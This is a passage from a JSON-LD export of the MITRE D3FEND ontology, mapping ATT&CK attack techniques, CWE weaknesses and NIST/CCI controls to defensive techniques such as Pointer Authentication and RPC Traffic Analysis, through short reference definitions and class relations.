        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "d3f:UserBehaviorAnalysis"
        }
      ],
      "rdfs:label": "RA-3(4)"
    },
    {
      "@id": "d3f:TA0040",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to manipulate, interrupt, or destroy your systems and data.\n\nImpact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine, but may have been altered to benefit the adversaries' goals. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.",
      "d3f:display-order": 12,
      "rdfs:label": "Impact",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:UserInitConfigurationFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user initialization configuration file is a file containing the information necessary to configure that part of a user's environment which is common to all applications and actions. User configurations may be overridden by more specific configuration information (such as that found in an application configuration file).",
      "rdfs:label": "User Init Configuration File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationFile"
        },
        {
          "@id": "d3f:UserLogonInitResource"
        }
      ],
      "skos:altLabel": "User Configuration File"
    },
    {
      "@id": "d3f:PointerAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PointerAuthentication"
      ],
      "d3f:authenticates": {
        "@id": "d3f:Pointer"
      },
      "d3f:d3fend-id": "D3-PAN",
      "d3f:definition": "Comparing the cryptographic hash or derivative of a pointer's value to an expected value.",
      "d3f:kb-article": "## How It Works\n\nPointer Authentication (frequently referred to as PAC, although the technique is properly Pointer Authentication) is a security feature to provide protection against attackers with memory read/write access.  A Pointer Authentication Code (PAC) is a cryptographic hash or derivative computed on the value of a pointer and some additional context information which can then provide a cryptographically strong guarantee about the likelihood that a pointer has been tampered with by an attacker.\n\nAlthough pointers are 64 bits, most systems have a substantially smaller virtual address space, leaving unused bits in pointers that can store the value of the PAC; storing the PAC in these bits reduces memory space requirements. One implementation is in ARMv8.3-A.  A PAC is computed over the 64-bit pointer value and a 64-bit context value.  Instructions are introduced to deal with pointers: one category to compute and insert the PAC into a pointer, another category to verify the pointer and invalidate the pointer if the PAC does not match, and a third category to remove the PAC and restore the original pointer value without verifying it.\n\nThe ARM standard specifies a cryptographic algorithm called QARMA-64 (designed by Qualcomm) to compute the signature, although this algorithm is not required.  The architecture provides for five secret 128-bit Pointer Authentication keys: two for instruction pointers, two for data pointers, and a general key for signing larger blocks of data.\n\n## Considerations\n\nIn the ARM implementation, the mechanisms above for manipulating PACs are provided, but it is up to the code developer to manage the keys for the cryptographic algorithm.\n\n\nA known potential limitation of PACs concerns signing gadgets. Under certain circumstances PACs can be bypassed by forcing the system to run a signing gadget which will allow the signing of arbitrary pointers to occur.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-PointerAuthenticationOnARMv8.3"
        },
        {
          "@id": "d3f:Reference-PointerAuthenticationProjectZero"
        }
      ],
      "rdfs:label": "Pointer Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "_:N8be0c73f2ddb48f2810b3d551e8a59f4"
        }
      ]
    },
    {
      "@id": "_:N8be0c73f2ddb48f2810b3d551e8a59f4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Pointer"
      }
    },
    {
      "@id": "d3f:TA0105",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Impact - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Impact"
    },
    {
      "@id": "d3f:T1636.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1636.004",
      "d3f:definition": "Adversaries may utilize standard operating system APIs to gather SMS messages. On Android, this can be accomplished using the SMS Content Provider. iOS provides no standard API to access SMS messages.",
      "rdfs:label": "SMS Messages - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1636"
      },
      "skos:prefLabel": "SMS Messages"
    },
    {
      "@id": "d3f:control-name",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "The control (or control enhancement) name.",
      "rdfs:label": "control-name",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-external-control-data-property"
      }
    },
    {
      "@id": "d3f:T1064",
      "@type": "owl:Class",
      "d3f:attack-id": "T1064",
      "d3f:definition": "**This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.**",
      "rdfs:label": "Scripting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:may-be-invoked-by",
      "@type": "owl:ObjectProperty",
      "owl:inverseOf": {
        "@id": "d3f:may-invoke"
      },
      "rdfs:label": "may-be-invoked-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:T1055.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1055.004",
      "d3f:definition": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:may-invoke": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "Asynchronous Procedure Call",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:N14160e62fa754e189e4a43c644d7cf2a"
        }
      ]
    },
    {
      "@id": "_:N14160e62fa754e189e4a43c644d7cf2a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:CCI-000034_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides the capability for a privileged administrator to enable/disable organization-defined security policy filters under organization-defined conditions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000034"
    },
    {
      "@id": "d3f:Reference-UserLoggedInToMultipleHosts_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-02-012/"
      },
      "d3f:kb-abstract": "Most users use only one or two machines during the normal course of business. User accounts that log in to multiple machines, especially over a short period of time, may be compromised. Remote logins among multiple machines may be an indicator of Lateral Movement.\n\nCertain users will likely appear as being logged into several machines and may need to be \"whitelisted.\" Such users would include network admins or user names that are common to many hosts.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:AuthenticationEventThresholding"
        },
        {
          "@id": "d3f:AuthorizationEventThresholding"
        }
      ],
      "d3f:kb-reference-title": "CAR-2013-02-012: User Logged in to Multiple Hosts",
      "rdfs:label": "Reference - CAR-2013-02-012: User Logged in to Multiple Hosts - MITRE"
    },
    {
      "@id": "d3f:CCI-000030_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces information flow control based on organization-defined metadata.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000030"
    },
    {
      "@id": "d3f:T1474.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1474.003",
      "d3f:definition": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.",
      "rdfs:label": "Compromise Software Supply Chain - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1474"
      },
      "skos:prefLabel": "Compromise Software Supply Chain"
    },
    {
      "@id": "d3f:T1574.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.004",
      "d3f:definition": "Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.",
      "d3f:may-create": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:may-modify": {
        "@id": "d3f:SharedLibraryFile"
      },
      "rdfs:label": "Dylib Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:N0a519a4ecff842ae8e89c0dda402522a"
        },
        {
          "@id": "_:N58782cdda9fe479c95add540600aa7f9"
        }
      ]
    },
    {
      "@id": "_:N0a519a4ecff842ae8e89c0dda402522a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N58782cdda9fe479c95add540600aa7f9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "d3f:loaded-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x loaded-by y: The entity x is brought into memory by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:loads"
      },
      "rdfs:label": "loaded-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:SoftwareClock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A clock implemented in software which may synchronize with hardware clocks or external time sources.",
      "d3f:implemented-by": {
        "@id": "d3f:Software"
      },
      "rdfs:label": "Software Clock",
      "rdfs:seeAlso": {
        "@id": "https://linux.die.net/sag/hw-sw-clocks.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Clock"
        },
        {
          "@id": "_:N8f13ee095a1249a6ac04ad264b568212"
        }
      ]
    },
    {
      "@id": "_:N8f13ee095a1249a6ac04ad264b568212",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:implemented-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:CWE-240",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-240",
      "d3f:definition": "The product does not handle or incorrectly handles when two or more structural elements should be consistent, but are not.",
      "rdfs:label": "Improper Handling of Inconsistent Structural Elements",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-237"
        },
        {
          "@id": "d3f:CWE-707"
        }
      ]
    },
    {
      "@id": "d3f:TA0008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to move through your environment.\n\nLateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain access. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier.",
      "d3f:display-order": 8,
      "rdfs:label": "Lateral Movement",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:T1574.009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.009",
      "d3f:creates": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.",
      "rdfs:label": "Path Interception by Unquoted Path",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:N8712c69acfac4dada39ff7fcd914063b"
        }
      ]
    },
    {
      "@id": "_:N8712c69acfac4dada39ff7fcd914063b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:T1575",
      "@type": "owl:Class",
      "d3f:attack-id": "T1575",
      "d3f:definition": "Adversaries may use Android’s Native Development Kit (NDK) to write native functions that can achieve execution of binaries or functions. Like system calls on a traditional desktop operating system, native code achieves execution on a lower level than normal Android SDK calls.",
      "rdfs:label": "Native API - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileExecutionTechnique"
        }
      ],
      "skos:prefLabel": "Native API"
    },
    {
      "@id": "d3f:Evict",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTactic"
      ],
      "d3f:definition": "The eviction tactic is used to remove an adversary from a computer network.",
      "d3f:display-order": 4,
      "d3f:display-priority": 0,
      "rdfs:label": "Evict",
      "rdfs:subClassOf": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "d3f:RPCTrafficAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RPCTrafficAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:RPCNetworkTraffic"
      },
      "d3f:d3fend-id": "D3-RTA",
      "d3f:definition": "Monitoring the activity of remote procedure calls in communication traffic to establish standard protocol operations and potential attacker activities.",
      "d3f:kb-article": "## How it works\nA remote procedure call (RPC) enables one computer to execute a specific function on another computer, as if it were a local application process. There are numerous RPC specifications and implementations. RPC capabilities can be abused by attackers in order to achieve a variety of tactical objectives including execution, persistence, initial access, and more. RPC proxies may be used to collect and store RPC traffic. RPCs can occur over network sockets or named pipes.\n\nAnalytics look for unauthorized behavior such as:\n\n* Processes being launched or scheduled remotely\n* System configurations being changed remotely\n* Unauthorized file read activity\n\nExample RPC Protocols:\n\n* DCE/RPC\n* CORBA\n* Open Network Computing Remote Procedure Call\n* D-Bus\n* XML-RPC\n* JSON-RPC\n* SOAP\n* Apache Thrift\n\n## Considerations\n* RPC is widely used in enterprise environments, and significant data filtering may be required in large environments to enable analytic processing.\n* RPC traffic may occur over a pipe, or within a host over loopback interface, thus making network collection difficult.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CAR-2014-11-007-RemoteWindowsManagementInstrumentation_WMI_OverRPC_MITRE"
        },
        {
          "@id": "d3f:Reference-CreateRemoteProcessViaWMIC_MITRE_Other"
        },
        {
          "@id": "d3f:Reference-RPCCallInterception_CrowdstrikeInc"
        },
        {
          "@id": "d3f:Reference-RemotelyLaunchedExecutablesViaServices_MITRE"
        },
        {
          "@id": "d3f:Reference-RemotelyLaunchedExecutablesViaWMI_MITRE"
        },
        {
          "@id": "d3f:Reference-RemotelyScheduledTasksViaSchtasks_MITRE"
        },
        {
          "@id": "d3f:Reference-SMBWriteRequest-NamedPipes_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2014-05-001%3ARPCActivity_MITRE"
        }
      ],
      "d3f:synonym": "RPC Protocol Analysis",
      "rdfs:label": "RPC Traffic Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N22e5724f28da4095b57e48617033e980"
        }
      ]
    },
    {
      "@id": "_:N22e5724f28da4095b57e48617033e980",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RPCNetworkTraffic"
      }
    },
    {
      "@id": "d3f:RTSPServer",
      "@type": "owl:Class",
      "d3f:definition": "A streaming server that utilizes the real-time streaming protocol.",
      "rdfs:label": "RTSP Server",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkAudioVisualStreamingResource"
      }
    },
    {
      "@id": "d3f:CCI-002277_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides authorized individuals (or processes acting on behalf of individuals) the capability to define the value of associated security attributes.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002277"
    },
    {
      "@id": "d3f:SPARTAThing",
      "@type": "owl:Class",
      "rdfs:label": "SPARTA Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ExternalThreatModelThing"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Account Management | Inactivity Logout",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:AccountLocking"
      },
      "rdfs:label": "AC-2(5)"
    },
    {
      "@id": "d3f:LevenshteinMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LM",
      "d3f:definition": "The Levenshtein distance (LD) is a metric for measuring the differences between two sequences - or strings. Informally, the LD is the number of individual edits one would have to make to turn one sequence into another.",
      "d3f:kb-article": "## References\n1. Navarro, G. (2001). A guided tour to approximate string matching. _ACM Computing Surveys_, 33(1), 31-88. [Link](https://doi.org/10.1145/375360.375365)",
      "d3f:synonym": "Edit Distance",
      "rdfs:label": "Levenshtein Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:ApproximateStringMatching"
      }
    },
    {
      "@id": "d3f:DeserializationFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Function with an input of serialized data which deserializes that data, usually with data parsing methods.",
      "rdfs:label": "Deserialization Function",
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForVulnerabilityRiskAssessment",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9317692B2"
      },
      "d3f:kb-abstract": "Embodiments of the present invention are directed to a method and system for automated risk analysis. The method includes accessing host configuration information of a host and querying a vulnerability database based on the host configuration information. The method further includes receiving a list of vulnerabilities and accessing a plurality of vulnerability scores. The list of vulnerabilities corresponds to vulnerabilities of the host. Vulnerabilities can be removed from the list based on checking for installed fixes corresponding to vulnerability. A composite risk score can then be determined for the host and each software product of the host based on the plurality of vulnerability scores. An aggregate risk score can then be determined for the host and each software product of the host based on the plurality of vulnerability scores.",
      "d3f:kb-author": "Matthew Cruz Elder, Darrell Martin Kienzle, Pratyusa K. Manadhata, Ryan Kumar Persaud",
      "d3f:kb-organization": "CA Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:AssetVulnerabilityEnumeration"
      },
      "d3f:kb-reference-title": "System and method for vulnerability risk analysis",
      "rdfs:label": "Reference - System and method for vulnerability risk analysis"
    },
    {
      "@id": "d3f:CWE-86",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-86",
      "d3f:definition": "The product does not neutralize or incorrectly neutralizes invalid characters or byte sequences in the middle of tag names, URI schemes, and other identifiers.",
      "rdfs:label": "Improper Neutralization of Invalid Characters in Identifiers in Web Pages",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-436"
        },
        {
          "@id": "d3f:CWE-79"
        }
      ]
    },
    {
      "@id": "d3f:SPARTAResourceDevelopmentTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0002"
      },
      "rdfs:label": "Resource Development Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:Nfe345642927748d297d73ec2416c9107"
        }
      ],
      "skos:prefLabel": "Resource Development Technique"
    },
    {
      "@id": "_:Nfe345642927748d297d73ec2416c9107",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0002"
      }
    },
    {
      "@id": "d3f:T1588",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588",
      "d3f:definition": "Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.",
      "rdfs:label": "Obtain Capabilities",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:CWE-570",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-570",
      "d3f:definition": "The product contains an expression that will always evaluate to false.",
      "rdfs:label": "Expression is Always False",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CCI-001764_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents program execution in accordance with organization-defined policies regarding software program usage and restrictions, and/or rules authorizing the terms and conditions of software program usage.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-02-28T00:00:00"
      },
      "rdfs:label": "CCI-001764"
    },
    {
      "@id": "d3f:T1148",
      "@type": "owl:Class",
      "d3f:attack-id": "T1148",
      "d3f:definition": "The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1562.003",
      "rdfs:label": "HISTCONTROL",
      "rdfs:seeAlso": {
        "@id": "d3f:T1562.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:OSAPIOpenFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that opens a file for reading, writing, or both, and return a handle or descriptor that can be used to interact with the file.",
      "d3f:invokes": {
        "@id": "d3f:OpenFile"
      },
      "rdfs:label": "OS API Open File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N02432584959e42fd9af6f89c399a3520"
        }
      ]
    },
    {
      "@id": "_:N02432584959e42fd9af6f89c399a3520",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OpenFile"
      }
    },
    {
      "@id": "d3f:SystemClockUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which the operating system's primary timekeeping value is modified or synchronized.",
      "rdfs:label": "System Clock Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SoftwareClockEvent"
        },
        {
          "@id": "_:N7179ceb97a844bd8b3b6fa642b413b03"
        }
      ]
    },
    {
      "@id": "_:N7179ceb97a844bd8b3b6fa642b413b03",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemClock"
      }
    },
    {
      "@id": "d3f:step-2",
      "@type": "owl:NamedIndividual",
      "d3f:invokes": {
        "@id": "d3f:ImpersonateUser"
      },
      "rdfs:label": "Step 2 - Impersonate User"
    },
    {
      "@id": "d3f:CWE-615",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-615",
      "d3f:definition": "While adding general comments is very useful, some programmers tend to leave important data, such as: filenames related to the web application, old links or links which were not meant to be browsed by users, old code fragments, etc.",
      "rdfs:label": "Inclusion of Sensitive Information in Source Code Comments",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-540"
      }
    },
    {
      "@id": "d3f:CCI-001118_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:NetworkIsolation"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements host-based boundary protection mechanisms for servers, workstations, and mobile devices.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001118"
    },
    {
      "@id": "d3f:T1636.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1636.005",
      "d3f:definition": "Adversaries may utilize standard operating system APIs to gather account data. On Android, this can be accomplished by using the AccountManager API. For example, adversaries may use the `getAccounts()` method to list all accounts.(Citation: Android_AccountManager_Feb2025) On iOS, this can be accomplished by using the Keychain services.",
      "rdfs:label": "Accounts - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1636"
      },
      "skos:prefLabel": "Accounts"
    },
    {
      "@id": "d3f:T1190",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1190",
      "d3f:definition": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.",
      "d3f:injects": {
        "@id": "d3f:DatabaseQuery"
      },
      "d3f:modifies": {
        "@id": "d3f:ProcessSegment"
      },
      "d3f:produces": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      },
      "rdfs:label": "Exploit Public-Facing Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "_:N0da59aa4c04a4818b383cc06af825746"
        },
        {
          "@id": "_:N43c2adb6664c49b2bf452e81eaec2df6"
        },
        {
          "@id": "_:N2fb966469c5d43ac99598b6d0a28ed63"
        }
      ]
    },
    {
      "@id": "_:N0da59aa4c04a4818b383cc06af825746",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:injects"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseQuery"
      }
    },
    {
      "@id": "_:N43c2adb6664c49b2bf452e81eaec2df6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "_:N2fb966469c5d43ac99598b6d0a28ed63",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:M1053",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "Comprehensive IT disaster recovery plans are outside the current scope of D3FEND.",
      "rdfs:label": "Data Backup"
    },
    {
      "@id": "d3f:iOSProcess",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Process"
      ],
      "rdfs:label": "iOS Process"
    },
    {
      "@id": "d3f:CCI-002710_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
